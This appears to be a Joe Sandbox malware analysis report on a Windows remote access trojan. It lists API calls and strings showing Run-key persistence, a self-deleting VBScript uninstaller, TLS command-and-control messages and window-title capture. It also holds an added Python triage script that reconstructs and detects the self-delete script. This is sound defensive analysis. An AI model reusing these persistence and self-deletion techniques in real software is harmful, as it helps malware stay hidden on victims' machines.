• ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D412
• ExitProcess.KERNEL32 ref: 1568D419
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-3018399277
• Opcode ID: 5c6ba121bbc81939592028d2a9b04909d04d3e46372f4e47df596c0c85caf505
• Instruction ID: 5bd56f600e9d44516383a4af139d29851bb85ffebf176b6bf7e7534d51070221
• Opcode Fuzzy Hash: 5c6ba121bbc81939592028d2a9b04909d04d3e46372f4e47df596c0c85caf505
• Instruction Fuzzy Hash: 5381937571A3409BC719EB20DCA09AF73F9AF95214F50091DE486572A0EF34BD09C7EA
Uniqueness
Uniqueness Score: -1.00%

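The function above is the sample's uninstall path: it reads its own image path (GetModuleFileNameW), deletes its HKCU autorun entries (RegDeleteKeyA with hKey 80000001 = HKEY_CURRENT_USER, against the Run and Policies\Explorer\Run paths in the string list), resets file attributes to FILE_ATTRIBUTE_NORMAL (00000080), terminates its worker threads and removes its Windows hook, launches a .vbs from Temp with ShellExecuteW "open", and calls ExitProcess. The string fragments show what that script does: loop `while fso.FileExists("...")` / `fso.DeleteFile "..."` / `wend` until the binary is no longer locked by the exiting process, `fso.DeleteFolder` the install folder, then `fso.DeleteFile(Wscript.ScriptFullName)`. The following is an added example, not code from the sample or from Joe Sandbox: a small Python triage that reconstructs such a script from those fragments (the line layout, the paths and the folder name are assumptions) and flags the poll-delete-then-self-delete idiom in any .vbs found under a directory such as a user's Temp folder.

```python
import re
from pathlib import Path

# Constructed sample (not a file recovered from the analysed sample): a VBScript
# laid out from the string fragments in the report ("On Error Resume Next",
# 'Set fso = CreateObject("Scripting.FileSystemObject")', 'while fso.FileExists("',
# 'fso.DeleteFile "', "wend", 'fso.DeleteFolder "',
# "fso.DeleteFile(Wscript.ScriptFullName)"). Paths and folder name are placeholders.
PAYLOAD = r"C:\Users\user\AppData\Roaming\example\payload.exe"
FOLDER = r"C:\Users\user\AppData\Roaming\example"
SAMPLE_VBS = (
    "On Error Resume Next\n"
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    f'while fso.FileExists("{PAYLOAD}")\n'
    f'fso.DeleteFile "{PAYLOAD}"\n'
    "wend\n"
    f'fso.DeleteFolder "{FOLDER}"\n'
    "fso.DeleteFile(Wscript.ScriptFullName)\n"
)

# Constructed benign script that also uses FileSystemObject, to show the
# classifier does not fire on ordinary file-management VBScript.
BENIGN_VBS = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'fso.CopyFile "C:\\src\\report.txt", "C:\\dst\\report.txt"\n'
)

# A busy-wait loop that keeps deleting one path until FileExists turns false:
# the file can only disappear once the process holding it open has exited,
# which is the "wait for the parent to die, then clean up" idiom.
POLL_DELETE_RE = re.compile(
    r'while\s+fso\.FileExists\("(?P<path>[^"]+)"\)\s*\n'
    r'(?P<body>.*?)\n\s*wend\b',
    re.IGNORECASE | re.DOTALL,
)
SELF_DELETE_RE = re.compile(
    r"fso\.DeleteFile\s*\(\s*Wscript\.ScriptFullName\s*\)", re.IGNORECASE
)
DELETE_TARGET_RE = re.compile(
    r'fso\.Delete(?:File|Folder)\s*\(?\s*"(?P<path>[^"]+)"', re.IGNORECASE
)


def polled_delete_paths(script: str) -> list[str]:
    """Paths that a `while fso.FileExists(...) ... wend` loop keeps deleting."""
    paths = []
    for m in POLL_DELETE_RE.finditer(script):
        body_targets = {t.group("path").lower() for t in DELETE_TARGET_RE.finditer(m.group("body"))}
        if m.group("path").lower() in body_targets:
            paths.append(m.group("path"))
    return paths


def delete_targets(script: str) -> list[str]:
    """Every quoted path passed to fso.DeleteFile / fso.DeleteFolder."""
    return [m.group("path") for m in DELETE_TARGET_RE.finditer(script)]


def classify_vbs(script: str) -> dict:
    """Flag the uninstall idiom: poll-delete a binary, then delete the script itself."""
    polled = polled_delete_paths(script)
    self_delete = SELF_DELETE_RE.search(script) is not None
    return {
        "uninstall_script": bool(polled) and self_delete,
        "self_delete": self_delete,
        "polled_paths": polled,
        "delete_targets": delete_targets(script),
    }


def scan_directory(root: Path) -> list[tuple[Path, dict]]:
    """Classify every *.vbs under root and return the ones matching the idiom."""
    hits = []
    for p in root.rglob("*.vbs"):
        try:
            text = p.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        verdict = classify_vbs(text)
        if verdict["uninstall_script"]:
            hits.append((p, verdict))
    return hits


if __name__ == "__main__":
    import json
    print(json.dumps(classify_vbs(SAMPLE_VBS), indent=2))
```

The polled path is the more useful output than the self-delete flag alone: when the script is found after the fact it tells you which binary the RAT considered its installed copy, and the DeleteFolder target tells you the install directory to check for leftovers. The loop itself is why such scripts are routinely seen spinning in wscript.exe for a few seconds after the parent exits.
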
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000001,1568764D,C:\Users\user\Desktop\fu56fbrtn8.exe,00000003,15687675,156F52D8,156876CE), ref: 15687284
• GetProcAddress.KERNEL32(00000000), ref: 1568728D
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 156872A2
• GetProcAddress.KERNEL32(00000000), ref: 156872A5
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 156872B6
• GetProcAddress.KERNEL32(00000000), ref: 156872B9
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 156872CA
• GetProcAddress.KERNEL32(00000000), ref: 156872CD
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 156872DE
• GetProcAddress.KERNEL32(00000000), ref: 156872E1
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 156872F2
• GetProcAddress.KERNEL32(00000000), ref: 156872F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-1327784115
• Opcode ID: b38822725d5abc176da64822bfc66ab800aaf00aede4654ca7017c9bc5957147
• Instruction ID: 18b8f5c3db9abfc2ca53b0207c6d714eaa2d54adfd751239929375042fa8d3d7
• Opcode Fuzzy Hash: b38822725d5abc176da64822bfc66ab800aaf00aede4654ca7017c9bc5957147
• Instruction Fuzzy Hash: 0C0121B1E1232A66DB22AB7E5CB4D8B6E9CEE60165305192BF805D3501EE79C800CEF0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?), ref: 1569C036
• _memcmp.LIBVCRUNTIME ref: 1569C04E
• lstrlenW.KERNEL32(?), ref: 1569C067
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 1569C0A2
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 1569C0B5
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 1569C0F9
• lstrcmpW.KERNEL32(?,?), ref: 1569C114
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 1569C12C
• _wcslen.LIBCMT ref: 1569C13B
• FindVolumeClose.KERNEL32(?), ref: 1569C15B
• GetLastError.KERNEL32 ref: 1569C173
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 1569C1A0
• lstrcatW.KERNEL32(?,?), ref: 1569C1B9
• lstrcpyW.KERNEL32(?,?), ref: 1569C1C8
• GetLastError.KERNEL32 ref: 1569C1D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: eca4ce2ec67ddafdce10265aec8574826e621569176dc9cc63942240dff0f4b7
• Instruction ID: 4e9413fb2ee1796e74f0ae15401a2f1e448a11214768cbb9070301c8cf2ba219
• Opcode Fuzzy Hash: eca4ce2ec67ddafdce10265aec8574826e621569176dc9cc63942240dff0f4b7
• Instruction Fuzzy Hash: E0419071A1835AAFE714DF60D88899B77EDFB44760F00092AF985C2160EB71D548CBD6
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 193971ad51dc9e82ba84245e2e3a746999f337eb3d8d02e38318866f8452cc1e
• Instruction ID: 7096affe625f493fa95466426266b232fa3698418409a636840d588ec383d32a
• Opcode Fuzzy Hash: 193971ad51dc9e82ba84245e2e3a746999f337eb3d8d02e38318866f8452cc1e
• Instruction Fuzzy Hash: D0D13471E05715ABDB14DF68CC90A9DF7A9FF05320B0142EEE961A7281EB35B900CBE4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 15694DD5
• LoadLibraryA.KERNEL32(?), ref: 15694E17
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 15694E37
• FreeLibrary.KERNEL32(00000000), ref: 15694E3E
• LoadLibraryA.KERNEL32(?), ref: 15694E76
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 15694E88
• FreeLibrary.KERNEL32(00000000), ref: 15694E8F
• GetProcAddress.KERNEL32(00000000,?), ref: 15694E9E
• FreeLibrary.KERNEL32(00000000), ref: 15694EB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: 84cbf1256786c346c1957db37e7ecd0fcc49a901e9a702fa6edb1a0b3ecc5ff4
• Instruction ID: eb1489f0a50eae79db91f4418355a8f968630937c4b724b55c2fd08109b161d6
• Opcode Fuzzy Hash: 84cbf1256786c346c1957db37e7ecd0fcc49a901e9a702fa6edb1a0b3ecc5ff4
• Instruction Fuzzy Hash: 8931CEB290632AABD720DF64DC84E8B7BECFB85355F400A1DE89593204DB31D941CBE6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DF6E9A
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DF6EAB
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DF6EBB
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DF6ECB
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DF6EDB
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DF6EEB
• GetProcAddress.KERNEL32 ref: 02DF6EFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: 2342dc38812304770d38c964063abbf9be6e083a64a68626b605fd36e13017e3
• Instruction ID: bd6ccd6fc9c0f8d557b45e18abbb6a1c67075df34465e2208bb277b73a1d1150
• Opcode Fuzzy Hash: 2342dc38812304770d38c964063abbf9be6e083a64a68626b605fd36e13017e3
• Instruction Fuzzy Hash: CCF030E09E93842DBE407B323CC282A366DEA216187820C5D663765F86E675CC944BB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 1569C6B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1569C6F5
• RegCloseKey.ADVAPI32(?), ref: 1569C9BF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: ff9053f376cf122009ff93ae5f7c412430e6e8f7cc0ac66abcba05f77d2977bf
• Instruction ID: e8a49f23ffdf76746f326591d1d45df2b7f1bc53deb05dd1f0acfb61a04b8385
• Instruction Fuzzy Hash: B481FA7520A3859FD328DB20D850EEFB7E9BF94304F50492DA59A83150FF30B949CAD6
Uniqueness

Uniqueness Score: -1.00%

APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 1569D5DA
• GetCursorPos.USER32(?), ref: 1569D5E9
• SetForegroundWindow.USER32(?), ref: 1569D5F2
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 1569D60C
• Shell_NotifyIconA.SHELL32(00000002,156F4B48), ref: 1569D65D
• ExitProcess.KERNEL32 ref: 1569D665
• CreatePopupMenu.USER32 ref: 1569D66B
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 1569D680
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 5cb15055144f88152dacfe037a12156a3370b8b082fc3d803c70baae5ba68cc3
• Instruction ID: 71ad73b1bf9ebed9a5bf6ceeff96f1d62d990358614f33384b89af480fc21607
• Instruction Fuzzy Hash: 3A214A7182415CEFDB098FA0CD9EF693F7AFB15352F010629F906914A1DB729960DBD0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: cbda6163bc452f823d596a0dd0e4042e14a1f560d9b0d39e76ab4ed4eb441041
• Instruction ID: de41754d12fc07b5ee217aaebfe201ee62438e40e262f77bd75c3423115f5ecc
• Instruction Fuzzy Hash: 94B1CC75A04205AFDB10CFA8C880BEEBBF5FF08300F1045AAE5A5B7651DA75BD41CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 156D130A
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D051F
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0531
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0543
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0555
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0567
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D0579
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D058B
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D059D
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05AF
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05C1
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05D3
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05E5
  • Part of subcall function 156D0502: _free.LIBCMT ref: 156D05F7
• _free.LIBCMT ref: 156D12FF
  • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
  • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
• _free.LIBCMT ref: 156D1321
• _free.LIBCMT ref: 156D1336
• _free.LIBCMT ref: 156D1341
• _free.LIBCMT ref: 156D1363
• _free.LIBCMT ref: 156D1376
• _free.LIBCMT ref: 156D1384
• _free.LIBCMT ref: 156D138F
• _free.LIBCMT ref: 156D13C7
• _free.LIBCMT ref: 156D13CE
• _free.LIBCMT ref: 156D13EB
• _free.LIBCMT ref: 156D1403
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: c53b04d17bcca7ecdaaa3f35c2e5fa840a2298091f82a077f1eadeb67ae3fe69
• Instruction ID: 631fd12540b5bf90ea580c237b01006ef4676798bb3db699da055b9dd4f6aebd
• Instruction Fuzzy Hash: 81317F31A08301DFDB108A39D840B5AB3E9FF04351F518D5AE8A5E7961DEB1BD80C7E8
Uniqueness

Uniqueness Score: -1.00%

APIs
• connect.WS2_32(FFFFFFFF,?,?), ref: 156848E0
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15684A00
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15684A0E
• WSAGetLastError.WS2_32 ref: 15684A21
  • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: e4579415cf4edae86d48537f46e531b9a475ead87e6f57fbf8e1bbf49f74eb6f
• Instruction ID: cb8fe7d9523c9686659c9a5d7ce43d3e17b336a8ef15cb307dc67f9fc0c45db2
• Instruction Fuzzy Hash: 5641E679B063066BDB14FB79CD5583D7A1AFB51114B80025DD8034BA59FF22B820CBE7
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 352fdd0512367db1a7e79e205feeff4e664dd1f44609d041f735d508e0a17579
                                                                                                                                                    • Instruction ID: 15fcf6e0b7eb8184f97838aab7eb3dd050fbe0c95146e8a048a4033b2cce4d51
                                                                                                                                                    • Opcode Fuzzy Hash: 352fdd0512367db1a7e79e205feeff4e664dd1f44609d041f735d508e0a17579
                                                                                                                                                    • Instruction Fuzzy Hash: 48C14076E41304ABDB20CAA8CC81FDEB7B8AB09750F144555FA45FB282E670BD41C7E4
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E38
• SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E43
• CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E4C
• closesocket.WS2_32(FFFFFFFF), ref: 15684E5A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E91
• SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EA2
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EA9
• SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EBA
• CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EBF
• CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684EC4
• SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684ED1
• CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684ED6
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
• Opcode ID: ec204924bd021769b23fa31f5e07a33d2b41d9dd00e70615110036df1ea91984
• Instruction ID: 16d2964ea5e83dc2be643457cdc89a992b65db8246a15503990488806a872945
• Opcode Fuzzy Hash: ec204924bd021769b23fa31f5e07a33d2b41d9dd00e70615110036df1ea91984
• Instruction Fuzzy Hash: A7211A31115B14AFDB216B26CC48B16BBA6FF4033AF104A1DE5E2019F0CB61B851DB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DE28CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 2df0cb2fa01131769eba4dece9a7cd9d6fe73d7459f7fced8841d90a166a7f0c
• Instruction ID: 746242178a242111823bb7e052e4e07157bceee3d0be4255ca330a42e7ad64f3
• Opcode Fuzzy Hash: 2df0cb2fa01131769eba4dece9a7cd9d6fe73d7459f7fced8841d90a166a7f0c
• Instruction Fuzzy Hash: FFA1C670A042948BDF21BA2CCC88B9976EDEB09354F1441E5ED4A9B385CB758EC5CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 1568AD38
• Sleep.KERNEL32(000001F4), ref: 1568AD43
• GetForegroundWindow.USER32 ref: 1568AD49
• GetWindowTextLengthW.USER32(00000000), ref: 1568AD52
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1568AD86
• Sleep.KERNEL32(000003E8), ref: 1568AE54
  • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: de3492a99a4419a0d8564cb8c9523aae82673fc19f6d049ea7c0bb89f54a6b41
• Instruction ID: f0bf6cef37c09ca50f07965c3fa57bc498b18666c6e8d9af22e8f9c9b6a5f98f
• Opcode Fuzzy Hash: de3492a99a4419a0d8564cb8c9523aae82673fc19f6d049ea7c0bb89f54a6b41
• Instruction Fuzzy Hash: 6D51C6757093419BC314DB30D894A6E77AABF84214F44092DF886832E0EF74BD45C7E6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
  • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
